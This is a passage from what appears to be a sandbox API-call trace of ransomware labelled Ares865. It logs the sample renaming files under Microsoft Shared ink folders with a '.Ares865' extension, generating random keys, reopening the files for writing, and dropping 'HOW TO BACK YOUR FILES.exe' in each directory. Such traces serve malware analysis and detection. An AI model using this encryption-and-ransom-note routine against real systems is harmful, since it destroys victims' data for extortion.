| out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.Ares865") returned 91 [0077.307] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.ares865"), dwFlags=0x1) returned 1 [0077.310] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0077.313] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=392) returned 1 [0077.315] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0077.333] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.333] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.355] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0270) returned 1 [0077.370] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.370] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.371] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad" [0077.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cfed8 | out: hHeap=0x2b0000) returned 1 [0077.371] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23a0 | out: hHeap=0x2b0000) returned 1 [0077.371] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned 71 [0077.371] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad" [0077.371] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.371] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.375] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.376] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fa05740, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fa05740, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.376] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.376] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.376] wsprintfW (in: param_1=0x2e2d5f8, param_2="%s.%s" | out: param_1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.Ares865") returned 91 [0077.376] MoveFileExW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.ares865"), dwFlags=0x1) returned 1 [0077.377] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.Ares865" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad\\auxbase.xml.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x15c [0077.377] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e2e4f0 | out: lpFileSize=0x2e2e4f0*=1434) returned 1 [0077.377] CryptAcquireContextW (in: phProv=0x2e2d2b4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d2b4*=0x2f0270) returned 1 [0077.378] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2e2d2c8 | out: pbBuffer=0x2e2d2c8) returned 1 [0077.378] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0077.417] CryptAcquireContextW (in: phProv=0x2e2d264, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2e2d264*=0x2f0518) returned 1 [0077.418] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2e2d278 | out: pbBuffer=0x2e2d278) returned 1 [0077.418] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0077.418] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR" [0077.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1a88 | out: hHeap=0x2b0000) returned 1 [0077.418] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2620 | out: hHeap=0x2b0000) returned 1 [0077.418] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned 56 [0077.418] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR" [0077.418] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.418] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fr-fr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.422] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.422] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fr-FR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fa77b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fa77b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.422] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.422] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.422] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI" [0077.422] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1a08 | out: hHeap=0x2b0000) returned 1 [0077.423] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2280 | out: hHeap=0x2b0000) returned 1 [0077.423] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned 56 [0077.423] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI" [0077.423] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.423] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fi-fi\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.426] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.426] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fi-FI\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fa77b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fa77b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.426] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.426] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.427] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE" [0077.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1988 | out: hHeap=0x2b0000) returned 1 [0077.427] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25a0 | out: hHeap=0x2b0000) returned 1 [0077.427] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned 56 [0077.427] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE" [0077.427] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.427] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\et-ee\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.430] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.430] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\et-EE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fa77b60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fa77b60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.430] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.431] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.431] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES" [0077.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1908 | out: hHeap=0x2b0000) returned 1 [0077.431] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d23c0 | out: hHeap=0x2b0000) returned 1 [0077.431] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned 56 [0077.431] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES" [0077.431] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.431] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\es-es\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.435] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.435] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\es-ES\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fa9dcc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fa9dcc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.436] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.436] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.436] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" [0077.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1888 | out: hHeap=0x2b0000) returned 1 [0077.436] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2380 | out: hHeap=0x2b0000) returned 1 [0077.436] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned 56 [0077.436] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US" [0077.436] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.436] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.443] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.443] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fa9dcc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fa9dcc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.443] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.443] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.444] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR" [0077.444] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1688 | out: hHeap=0x2b0000) returned 1 [0077.444] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2360 | out: hHeap=0x2b0000) returned 1 [0077.444] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned 56 [0077.444] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR" [0077.444] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.444] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\el-gr\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.448] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.448] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\el-GR\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fa9dcc0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fa9dcc0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.448] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.449] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.449] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE" [0077.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1808 | out: hHeap=0x2b0000) returned 1 [0077.449] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2600 | out: hHeap=0x2b0000) returned 1 [0077.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned 56 [0077.449] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE" [0077.449] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.449] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.452] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.452] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fac3e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fac3e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.453] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.453] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.453] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK" [0077.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1788 | out: hHeap=0x2b0000) returned 1 [0077.453] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d25e0 | out: hHeap=0x2b0000) returned 1 [0077.453] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned 56 [0077.453] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK" [0077.453] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.453] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.461] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.461] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd77a70c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fac3e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fac3e20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0077.461] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0077.461] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0077.461] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ", iMaxLength=260 | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ" [0077.461] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c1708 | out: hHeap=0x2b0000) returned 1 [0077.461] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2580 | out: hHeap=0x2b0000) returned 1 [0077.461] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned 56 [0077.461] lstrcatW (in: lpString1="", lpString2="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ" | out: lpString1="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ" [0077.462] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0077.462] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\how to back your files.exe"), bFailIfExists=1) returned 1 [0077.465] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0077.465] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x5fac3e20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5fac3e20, 